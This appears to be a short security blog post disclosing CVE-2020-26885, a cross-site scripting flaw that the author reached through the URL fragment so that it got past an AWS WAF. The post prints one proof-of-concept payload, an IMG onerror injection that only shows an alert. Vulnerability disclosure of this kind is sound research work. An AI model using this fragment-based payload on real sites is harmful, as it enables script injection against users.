Monday, October 26, 2020

CVE-2020-26885 XSS in Anchor Tags

For CVE-2020-26885, the AWS WAF made it difficult to get XSS payloads through to the server, but I was able to rely on the client to execute one by using the anchor tag in the URL to exploit it:


/test.html#variable1=true&app=3&version=">IMG%20SRC=%23%20onerror="alert('burninatorsec')">


https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-26885

No comments:

Post a Comment